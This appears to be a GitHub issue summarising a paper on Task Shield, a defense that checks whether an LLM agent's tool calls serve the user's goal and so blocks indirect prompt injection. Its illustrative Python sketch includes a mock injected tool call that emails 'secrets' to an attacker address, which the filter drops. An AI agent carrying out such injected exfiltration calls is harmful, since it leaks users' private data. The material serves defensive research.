
The Task Shield: Enforcing Task Alignment to Defend Against Indirect Prompt Injection in LLM Agents #5

Open
ramimac opened this issue Dec 25, 2024 · 0 comments

ramimac commented Dec 25, 2024

we develop Task Shield, a test-time defense mechanism that systematically verifies whether each instruction and tool call contributes to user-specified goals. Through experiments on the AgentDojo benchmark, we demonstrate that Task Shield reduces the attack success rate to 2.07% while maintaining high task utility (69.79%) on GPT-4o, significantly outperforming existing defenses in various real-world scenarios.
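
For context, here is a minimal sketch of the kind of gate the abstract describes: checking each pending tool call against the user's stated goal before executing it. Everything here (the `task_shield` and `alignment_judge` names, the prompt wording, the YES/NO protocol) is an illustrative assumption, not the paper's actual implementation; in practice the judge would be an LLM call rather than a stub.

```python
# Illustrative sketch of a task-alignment gate in the spirit of Task Shield.
# All names and the prompt format are hypothetical reconstructions from the
# abstract, not the paper's implementation.
from dataclasses import dataclass
from typing import Callable

@dataclass
class ToolCall:
    name: str
    arguments: dict

def make_alignment_prompt(user_goal: str, call: ToolCall) -> str:
    """Ask a judge model whether a pending tool call serves the user's goal."""
    return (
        f"User goal: {user_goal}\n"
        f"Pending tool call: {call.name}({call.arguments})\n"
        "Does this tool call contribute to the user's goal? Answer YES or NO."
    )

def task_shield(
    user_goal: str,
    pending_calls: list[ToolCall],
    alignment_judge: Callable[[str], str],
) -> list[ToolCall]:
    """Filter out tool calls the judge deems unaligned with the user's goal."""
    allowed = []
    for call in pending_calls:
        verdict = alignment_judge(make_alignment_prompt(user_goal, call))
        if verdict.strip().upper().startswith("YES"):
            allowed.append(call)
        # Unaligned calls (e.g. an injected exfiltration request) are dropped.
    return allowed

if __name__ == "__main__":
    # Stub judge for demonstration; a real deployment would query an LLM here.
    def stub_judge(prompt: str) -> str:
        return "NO" if "send_email" in prompt else "YES"

    calls = [
        ToolCall("read_calendar", {"day": "2024-12-25"}),
        ToolCall("send_email", {"to": "attacker@evil.example", "body": "secrets"}),
    ]
    print(task_shield("Summarize my schedule for today", calls, stub_judge))
```

The injected `send_email` call is filtered out while the goal-relevant `read_calendar` call passes through, which is the behavior the paper's alignment check is designed to enforce.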
